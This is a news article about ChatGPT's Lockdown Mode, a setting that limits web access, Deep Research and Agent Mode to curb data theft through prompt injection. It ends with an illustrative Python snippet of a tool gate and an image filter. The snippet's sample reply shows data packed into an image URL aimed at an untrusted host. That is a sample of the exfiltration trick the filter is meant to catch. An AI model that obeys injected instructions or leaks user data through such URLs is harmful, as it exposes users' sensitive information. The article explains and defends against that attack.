ChatGPT's new Lockdown Mode disables web access, Deep Research and Agent Mode to guard against prompt injection attacks
OpenAI has introduced Lockdown Mode for ChatGPT, which can disable web access, Deep Research and Agent Mode, making it harder to steal data through prompt injection attacks. The mode does not fully prevent such attacks; it only cuts off the final step of the data exfiltration chain. The prompt injection problem itself remains unsolved.
ChatGPT's new Lockdown Mode lets you disable web access and more to protect sensitive data from prompt injection
Key Points
OpenAI has released a new "Lockdown Mode" for ChatGPT that disables functions such as web access, deep research, and agent mode to protect users from potential data theft.
The feature blocks all connections to the internet and external services, preventing sensitive data from being leaked during conversations with the AI.
Users can activate Lockdown Mode in the security settings and temporarily disable it for individual conversations when broader functionality is needed.
With the new Lockdown Mode, ChatGPT users can disable web access, Deep Research, and Agent Mode to better protect themselves against data theft through prompt injection attacks. The feature is aimed primarily at users handling sensitive data.
Lockdown Mode restricts all features that connect ChatGPT to the internet or external services. The goal is to prevent attackers from using prompt injections, hidden instructions embedded in text or files, to manipulate the model's behavior and exfiltrate sensitive user data. OpenAI says the feature is designed for individuals and organizations working with particularly sensitive data.
Live web search is limited to cached content, which means search results may be outdated or unavailable entirely. Deep Research and Agent Mode are fully disabled. ChatGPT can no longer download files and won't display web images in regular responses. Network access for Canvas-generated code is blocked too.
Prompt injection remains an unsolved problem
OpenAI calls prompt injection a "frontier, challenging research problem" it's working to solve. That's true, but only part of the story: prompt injections have been a well-known LLM vulnerability since at least GPT-3, frequently exploited, and years of research still haven't produced a fix.
Lockdown Mode confirms that status quo: it's a band-aid, not a fix for prompt injections. It builds on existing defenses, including sandboxing, URL-based exfiltration protection, monitoring, and access controls. But a manipulative instruction hidden in an uploaded file can still influence the model's behavior and lead to wrong answers, OpenAI says. The mode only blocks the final step in an exfiltration chain, the attempt to send data to an attacker via network requests.
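To make the "last step only" point concrete, here is an added illustration (not OpenAI's code) of an enforcement layer modelled on what the article describes: a per-tool policy that degrades or blocks the capabilities listed above, a per-conversation opt-out, and a URL-based filter that strips external images from a reply before rendering. The tool names, the policy table and the sample reply are constructed for this example; the reply's text still reflects whatever steered the model, which is exactly what such a filter does not fix.

```python
import re

# Constructed policy table derived from the article: what Lockdown Mode does to each
# network-facing capability. Tool names are hypothetical, not OpenAI's identifiers.
LOCKDOWN_POLICY = {
    "web_search": "cached_only",   # live search limited to cached content
    "deep_research": "blocked",
    "agent_mode": "blocked",
    "file_download": "blocked",
    "canvas_network": "blocked",   # code generated in Canvas gets no network
}

# Markdown image whose source is an external http(s) host.
EXTERNAL_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")

def gate_tool_call(tool: str, lockdown: bool, per_chat_override: bool = False) -> str:
    """Return 'allow', 'cached_only' or 'blocked' for a requested tool call.

    per_chat_override models the article's "temporarily disable it for individual
    conversations": the user opts one chat out and full functionality returns."""
    if not lockdown or per_chat_override:
        return "allow"
    return LOCKDOWN_POLICY.get(tool, "allow")   # tools not in the table are local-only

def render_response(text: str, lockdown: bool) -> tuple[str, list[str]]:
    """Strip external images from a reply when locked down.

    This is the final step of an exfiltration chain the article refers to: the model
    may already have been steered by an injected instruction, but the client fetches
    nothing from an outside host, so no data leaves in a URL."""
    if not lockdown:
        return text, []
    removed = EXTERNAL_IMAGE.findall(text)
    return EXTERNAL_IMAGE.sub("[external image removed by lockdown mode]", text), removed

# Constructed sample reply: the prose is what the user sees; the image pointing at an
# outside host is what a URL-based exfiltration filter is meant to catch.
SAMPLE_REPLY = ("Summary of the uploaded report: revenue grew 4%.\n"
                "![chart](https://untrusted-host.example/c.png?q=revenue-grew-4)")

if __name__ == "__main__":
    print(gate_tool_call("deep_research", lockdown=True))      # blocked
    print(gate_tool_call("web_search", lockdown=True))         # cached_only
    print(gate_tool_call("web_search", lockdown=True, per_chat_override=True))  # allow
    cleaned, removed = render_response(SAMPLE_REPLY, lockdown=True)
    print(cleaned)
    print("removed:", removed)
```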